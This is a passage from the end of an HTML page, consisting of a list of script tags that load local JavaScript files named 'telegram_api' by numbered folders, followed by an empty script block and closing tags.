  <script src="telegram_api_8/telegram_api_8_1/telegram_api_8_1_2.js"></script>
  <script src="telegram_api_8/telegram_api_8_1/telegram_api_8_1_3.js"></script>
  <script src="telegram_api_8/telegram_api_8_2/telegram_api_8_2_1.js"></script>
  <script src="telegram_api_8/telegram_api_8_2/telegram_api_8_2_2.js"></script>
  <script src="telegram_api_8/telegram_api_8_2/telegram_api_8_2_3.js"></script>
  <script src="telegram_api_8/telegram_api_8_3/telegram_api_8_3_1.js"></script>
  <script src="telegram_api_8/telegram_api_8_3/telegram_api_8_3_2.js"></script>
  <script src="telegram_api_8/telegram_api_8_3/telegram_api_8_3_3.js"></script>
  <script src="telegram_api_8/telegram_api_8_4/telegram_api_8_4_1.js"></script>
  <script src="telegram_api_8/telegram_api_8_4/telegram_api_8_4_2.js"></script>
  <script src="telegram_api_8/telegram_api_8_4/telegram_api_8_4_3.js"></script>
  <script src="telegram_api_8/telegram_api_8_5/telegram_api_8_5_1.js"></script>
  <script src="telegram_api_8/telegram_api_8_5/telegram_api_8_5_2.js"></script>
  <script src="telegram_api_8/telegram_api_8_5/telegram_api_8_5_3.js"></script>
  <script src="telegram_api_9/telegram_api_9_1/telegram_api_9_1_1.js"></script>
  <script src="telegram_api_9/telegram_api_9_1/telegram_api_9_1_2.js"></script>
  <script src="telegram_api_9/telegram_api_9_1/telegram_api_9_1_3.js"></script>
  <script src="telegram_api_9/telegram_api_9_2/telegram_api_9_2_1.js"></script>
  <script src="telegram_api_9/telegram_api_9_2/telegram_api_9_2_2.js"></script>
  <script src="telegram_api_9/telegram_api_9_2/telegram_api_9_2_3.js"></script>
  <script src="telegram_api_9/telegram_api_9_3/telegram_api_9_3_1.js"></script>
  <script src="telegram_api_9/telegram_api_9_3/telegram_api_9_3_2.js"></script>
  <script src="telegram_api_9/telegram_api_9_3/telegram_api_9_3_3.js"></script>
  <script src="telegram_api_9/telegram_api_9_4/telegram_api_9_4_1.js"></script>
  <script src="telegram_api_9/telegram_api_9_4/telegram_api_9_4_2.js"></script>
  <script src="telegram_api_9/telegram_api_9_4/telegram_api_9_4_3.js"></script>
  <script src="telegram_api_9/telegram_api_9_5/telegram_api_9_5_1.js"></script>
  <script src="telegram_api_9/telegram_api_9_5/telegram_api_9_5_2.js"></script>
  <script src="telegram_api_9/telegram_api_9_5/telegram_api_9_5_3.js"></script>
  
  <script>
  
  </script>

</body>
</html>